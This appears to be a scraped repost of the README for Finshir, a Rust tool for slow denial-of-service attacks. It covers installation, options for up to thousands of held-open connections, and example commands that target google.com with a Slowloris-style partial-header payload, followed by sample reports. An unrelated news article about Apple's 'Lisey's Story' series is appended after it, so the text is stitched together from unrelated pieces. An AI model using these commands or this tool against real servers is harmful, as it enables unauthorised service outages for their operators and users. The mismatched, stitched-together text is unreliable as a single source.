Finshir – A Coroutines-Driven Low And Slow Traffic Sender, Written In Rust

You are seeing a high-performant, coroutines-driven, and fully customisable implementation of Low & Slow ^(https://www.appmarsh.com/link/https://www.cloudflare.com/learning/ddos/ddos-low-and-slow-attack/) load generator ^(https://www.appmarsh.com/link/https://www.kitploit.com/search/label/Load%20Generator) designed for real-world pentesting. You can easily torify/proxify it using various platform-dependent utilities.

coroutines ^(https://www.appmarsh.com/link/https://en.wikipedia.org/wiki/Coroutine) (also called lightweight threads) instead of ordinary threads, which lets you open many more connections with fewer system resources.

  • Generic. Unlike other Low & Slow utilities, Finshir lets you transmit arbitrary data sets over the TCP ^(https://www.appmarsh.com/link/https://en.m.wikipedia.org/wiki/Transmission_Control_Protocol) protocol. It may be partial HTTP headers, empty spaces, and so on.
  • Written in Rust. How you can see, all the logic is written completely in Rust ^(https://www.appmarsh.com/link/https://www.rust-lang.org/), which means that it leverages bare-metal performance ^(https://www.appmarsh.com/link/https://www.kitploit.com/search/label/Performance) and high-level safety (no SIGSEGV, SIGILL, and other “funny” stuff).
  • Disadvantages

    • Platform-dependent. Like most of pentesting ^(https://www.appmarsh.com/link/https://www.kitploit.com/search/label/Pentesting) utilities, this project is developed for only UNIX-based systems. If you are a Windows user, you probably need a virtual machine ^(https://www.appmarsh.com/link/https://en.wikipedia.org/wiki/Virtual_machine) or another computer with UNIX.

    Installation

    Building from crates.io

    $ cargo install finshir

    Building from sources

    $ git clone https://github.com/Gymmasssorla/finshir.git
    $ cd finshir
    $ cargo build --release

    Pre-compiled binaries

    $ wget https://github.com/Gymmasssorla/finshir/releases/download/vX.X.X/finshir-x86_64-linux
    $ chmod a+x finshir-x86_64-linux

    Usage

    Flags

    NameExplanation
    -h, --helpPrints help information
    --use-tlsUse a TLS connection instead of the ordinary TCP protocol. It might be used to test HTTPS-based services.
    -V, --versionPrints version information

    Options

    NameValueDefaultExplanation
    --connect-periodicityTime span7secsThis option will be applied if a socket connection error occurs (the next connection will be performed after this periodicity)
    --connect-timeoutTime span10secsTry connect a socket within a specified timeout. If a timeout is reached and a socket wasn’t connected, the program will retry the operation later
    --connectionsPositive integer1000A number of connections the program will handle simultaneously. This option also equals to a number of coroutines
    --date-time-formatString%XA format for displaying local date and time in log messages. Type man strftime to see the format specification
    --failed-countPositive integer5A number of failed data transmissions used to reconnect a socket to a remote web server
    --ip-ttlUnsigned integerNoneSpecifies the IP_TTL value for all future sockets. Usually this value equals a number of routers ^(https://www.appmarsh.com/link/https://www.kitploit.com/search/label/Routers) that a packet can go through
    --json-reportFilenameNoneA file to which a JSON report (also called a “total summary”) will be generated before exiting
    -f, --portions-fileFilenameNoneA file which consists of a custom JSON array of data portions, specified as strings.

    When a coroutine finished sending all portions, it reconnects its socket and starts sending them again.

    -r, --receiverSocket addressNoneA receiver of generator traffic, specified as an IP address (or a domain name) and a port number, separated by a colon
    -d, --test-durationTime span64years 64hours 64secsA whole test duration, after which all spawned coroutines will stop their work
    --text-reportFilenameNoneA file to which the program will generate a human-readable report (also called a “total summary”) before exiting
    -v, --verbosityFrom 0 to 53Enable one of the possible verbosity levels. The zero level doesn’t print anything, and the last level prints everything.

    Note that specifying the 4 and 5 verbosity levels might decrease performance, do it only for debugging.

    -w, --waitTime span5secsA waiting time span before test execution used to prevent a launch of an erroneous (unwanted) test
    --write-periodicityTime span30secsA time interval between writing data portions. This option can be used to modify test intensity
    --write-timeoutTime span10secsIf a timeout is reached and a data portion wasn’t sent, the program will retry the operation later
    --xml-reportFilenameNoneA file to which an XML report (also called a “total summary”) will be generated before exiting

    Overview

    Minimal command
    The following command spawns 1000 coroutines, each trying to establish a new TCP connection. When connections are established, it sends empty spaces every 30 seconds, thereby order a server to wait as long as it can:

    # Specify one of the Google's IP addresses as a target web server
    $ finshir --receiver=google.com:80

    Test intensity
    Low & Slow techniques assume to be VERY SLOW, which means that you typically send a couple of bytes every N seconds. For instance, Finshir uses the 30 seconds interval by default, but it’s modifiable as well:

    # Test the Google's server sending data portions every one minute
    $ finshir --receiver=google.com:80 --write-periodicity=1min

    Connections count
    The default number of parallel connections is 1000. However, you can modify this limit using the --connections option, but be sure that you system is able to handle such amount of file descriptors:

    # Modify the default limit of file descriptors to 17015
    $ sudo ulimit -n 17015

    # Test the target server using 17000 parallel TCP connections
    $ finshir --receiver=google.com:80 --connections=17000

    Logging options
    Consider specifying a custom verbosity level from 0 to 5 (inclusively), which is done by the --verbosity option. There is also the --date-time-format option which tells Finshir to use your custom date-time format.

    # Use a custom date-time format and the last verbosity level
    $ finshir --receiver=google.com:80 --date-time-format="%F" --verbosity=5

    Different verbosity levels print different logging types. As you can see in the table below, the zero verbosity level prints nothing, and the last one prints everything. The levels in the middle print logs selectively:

    ErrorsWarningsNotificationsDebugsTraces
    Zero (0)
    First (1)
    Second (2)
    Third (3)
    Fourth (4)
    Fifth (5)

    TLS support
    Most of web servers today use the HTTPS protocol instead of HTTP, which is based on TLS. Since v0.2.0 ^(https://www.appmarsh.com/link/https://github.com/Gymmasssorla/finshir/releases/tag/v0.2.0), Finshir has functionality to connect through TLS using the --use-tls flag.

    # Connect to the Google's server through TLS on 443 port (HTTPS)
    $ finshir --receiver=google.com:443 --use-tls

    Custom data portions
    By default, Finshir generates 100 empty spaces as data portions to send. You can override this behaviour by specifying your custom messages as a file, consisting of a single JSON array. This example is focused on Google:

    # Send partial HTTP headers ^(https://www.appmarsh.com/link/https://www.kitploit.com/search/label/Headers) to Google using `--portions-file`
    $ finshir --receiver=google.com:443 -f files/google.json --use-tls

    The command above sends a partial HTTPS request (first introduced by Slowloris ^(https://www.appmarsh.com/link/https://en.wikipedia.org/wiki/Slowloris_(computer_security))) through TLS (which is achieved by specifying the --use-tls flag). You can access this partial request inside files/google.json.
    (💫 A coroutines-driven Low & Slow traffic sender, written in Rust (46)”>files/google.json ^(https://www.appmarsh.com/link/https://github.com/Gymmasssorla/finshir/blob/master/files/google.json))

    [
    "GET https://www.google.com/ HTTP/1.1rn",
    "Host: www.google.comrn",
    "User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:66.0) Gecko/20100101 Firefox/66.0rn",
    "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8rn",
    "Accept-Language: en-US,en;q=0.5rn",
    "Accept-Encoding: gzip, deflate, brrn",
    "Connection: keep-alivern",
    "Upgrade-Insecure-Requests: 1rn",
    "Cache-Control: max-age=0rn",
    "TE: Trailersrn",
    "rn"
    ]

    Generate a report
    Report is a set of statistics variables like a total number of connections established, a total number of failed transmissions and so on. There is three options for this: --xml-report, --json-report, and --text-report:

    # Test the Google's server and generate a JSON report at the end
    $ finshir --receiver=google.com:80 --json-report=report.json

    What means “at the end”? Well, Finshir will generate a report for you either if allotted time expires or if you cancel the process by Ctrl-C. You can look at the report examples in the 💫 A coroutines-driven Low & Slow traffic sender, written in Rust (47)”>files/reports ^(https://www.appmarsh.com/link/https://github.com/Gymmasssorla/finshir/tree/master/files/reports) folder:
    (💫 A coroutines-driven Low & Slow traffic sender, written in Rust (48)”>files/reports/report.json ^(https://www.appmarsh.com/link/https://github.com/Gymmasssorla/finshir/blob/master/files/reports/report.json))

    {
    "connections": {
    "failed": "0",
    "successful": "305",
    "total": "305"
    },
    "receiver": "google.com:80",
    "time": {
    "test-duration": "4s 71ms 819us 653ns",
    "test-start": "Wed, 29 May 2019 22:04:34 -0000"
    },
    "total-bytes-sent": "305",
    "total-errors": "0",
    "transmissions": {
    "failed": "0",
    "successful": "305",
    "total": "305"
    }
    }

    (💫 A coroutines-driven Low & Slow traffic sender, written in Rust (49)”>files/reports/report.xml ^(https://www.appmarsh.com/link/https://github.com/Gymmasssorla/finshir/blob/master/files/reports/report.xml))



    google.com:80
    159
    0


    159
    0
    159


    159
    0
    159

    (💫 A coroutines-driven Low & Slow traffic sender, written in Rust (50)”>files/reports/report.txt ^(https://www.appmarsh.com/link/https://github.com/Gymmasssorla/finshir/blob/master/files/reports/report.txt))

    *********************** FINSHIR REPORT ***********************
    Receiver: google.com:80
    Total bytes sent: 535
    Total errors: 0

    Test start: Wed, 29 May 2019 22:04:55 -0000
    Test duration: 7s 385ms 765us 179ns

    Successful connections: 535
    Failed connections: 0
    Total connections: 535

    Successful transmissions: 535
    Failed transmissions: 0
    Total transmissions: 535
    **************************************************************

    If none of the options above has been specified, Finshir prints a report right to your terminal. That is, you can just run a test, cancel it later, and see the results which you can easily save. Perfect!

    Contributing
    You are always welcome for any contribution to this project! But before you start, you should read the appropriate document ^(https://www.appmarsh.com/link/https://github.com/Gymmasssorla/finshir/blob/master/CONTRIBUTING.md) to know about the preferred development process and the basic communication rules.

    Legal disclaimer
    Finshir was developed as a means of testing stress resistance of web servers, and not for hacking, that is, the author of the project IS NOT RESPONSIBLE for any damage caused by your use of his program.

    Project references

    • https://www.reddit.com/r/rust/comments/bm6ttn/finshir_a_coroutinesdriven_low_slow_ddos_attack/ ^(https://www.appmarsh.com/link/https://www.reddit.com/r/rust/comments/bm6ttn/finshir_a_coroutinesdriven_low_slow_ddos_attack/)
    • https://www.producthunt.com/posts/finshir ^(https://www.appmarsh.com/link/https://www.producthunt.com/posts/finshir)
    • https://www.reddit.com/r/hacking/comments/bpg0by/ive_written_a_customizable_optimized_alternative/ ^(https://www.appmarsh.com/link/https://www.reddit.com/r/hacking/comments/bpg0by/ive_written_a_customizable_optimized_alternative/)
    • https://news.ycombinator.com/item?id=19931443 ^(https://www.appmarsh.com/link/https://news.ycombinator.com/item?id=19931443)
    • https://www.reddit.com/r/rust/comments/bpor6b/finshir_a_coroutinesdriven_and_fully_customizable/ ^(https://www.appmarsh.com/link/https://www.reddit.com/r/rust/comments/bpor6b/finshir_a_coroutinesdriven_and_fully_customizable/)
    • https://news.ycombinator.com/item?id=19962333 ^(https://www.appmarsh.com/link/https://news.ycombinator.com/item?id=19962333)
    • https://www.reddit.com/r/rust/comments/bqyaok/finshir_v022_was_released_any_suggestions_to_low ^(https://www.appmarsh.com/link/https://www.reddit.com/r/rust/comments/bqyaok/finshir_v022_was_released_any_suggestions_to_low)
    • https://www.reddit.com/r/rust/comments/btdu1a/finshir_v030_was_released_now_with_report/ ^(https://www.appmarsh.com/link/https://www.reddit.com/r/rust/comments/btdu1a/finshir_v030_was_released_now_with_report/)

    Contacts
    Temirkhan Myrzamadi ^(https://www.appmarsh.com/link/https://github.com/Gymmasssorla) <[email protected]> (the author)

    Download Finshir ^(https://www.appmarsh.com/link/https://github.com/Gymmasssorla/finshir)

    Apple Inks Deal for ‘Lisey’s Story’ TV Show Written by Stephen King and Starring Julianne Moore

    Apple has given a straight to series order for eight episodes of “Lisey’s Story,” a TV show based on the Stephen King novel of the same name, reports The Hollywood Reporter ^(https://www.appmarsh.com/link/https://www.appmarsh.com/live-feed/julianne-moore-star-stephen-king-jj-abrams-apple-drama-liseys-story-1200281).

    Julianne Moore is set to star in the series, while Stephen King will write all eight episodes in addition to executive producing. As The Hollywood Reporter points out, King does not often write for TV shows, making “Lisey’s Story” notable.

    Image credit: Getty Images via The Hollywood Reporter ^(https://www.appmarsh.com/link/https://www.appmarsh.com/live-feed/julianne-moore-star-stephen-king-jj-abrams-apple-drama-liseys-story-1200281)


    In the past, King has called ^(https://www.appmarsh.com/link/https://variety.com/2018/tv/news/stephen-king-mr-mercedes-it-movie-what-scares-him-1202518482/) “Lisey’s Story” one of his favorite books, and one that he’d love to see turned into a television series.

    The novel, which is a psychological horror with romance elements, is split between Lisey’s life in the present time and her dead husband’s life (a famous novelist) as she remembers it. Lisey begans to remember things about her husband that she had suppressed while being terrorized in the present by a former fan of her husband’s.

    Along with King and Moore, the series also boasts J.J. Abrams and Ben Stephenson of Bad Robot Productions as executive producers. This is the third series Abrams is working on for Apple, as he is also developing “Little Voice” with Sara Bareilles and “My Glory Was I Had Such Friends” with Jennifer Garner.

    Julianne Moore has recently starred in movies that include “Kingsman: The Golden Circle,” “Bel Canto,” “Gloria Bell,” and “Suburbicon,” but she has not been in a television series since her stint on “As the World Turns” in the 80s, with the exception of a few appearances on “30 Rock.”

    Apple currently has more than two dozen television shows in the works for its upcoming Apple TV+ service ^(https://www.appmarsh.com/link/https://www.appmarsh.com/guide/apple-tv-plus/), which is set to debut this fall. We have a running list of all of the TV shows and movies that Apple is working on available in our original content guide ^(https://www.appmarsh.com/link/https://www.appmarsh.com/guide/apple-tv-shows/).

    Tags: Apple TV ^(https://www.appmarsh.com/link/https://www.appmarsh.com/roundup/apple-tv/), Apple’s Hollywood ambitions ^(https://www.appmarsh.com/link/https://www.appmarsh.com/roundup/apples-hollywood-ambitions/)

    This article, “Apple Inks Deal for ‘Lisey’s Story’ TV Show Written by Stephen King and Starring Julianne Moore ^(https://www.appmarsh.com/link/https://www.appmarsh.com/2019/04/08/apple-tv-series-liseys-story-stephen-king/)” first appeared on appmarsh.com ^(https://www.appmarsh.com/link/https://www.appmarsh.com/)

    Discuss this article ^(https://www.appmarsh.com/link/https://forums.appmarsh.com/threads/apple-tv-series-liseys-story-stephen-king.2177136/) in our forums

    ^(https://www.appmarsh.com/link/http://feeds.appmarsh.com/~ff/appmarsh-All?a=0dlI5atNK_I:bgH4e_BPK0Q:6W8y8wAjSf4) ^(https://www.appmarsh.com/link/http://feeds.appmarsh.com/~ff/appmarsh-All?a=0dlI5atNK_I:bgH4e_BPK0Q:qj6IDK7rITs)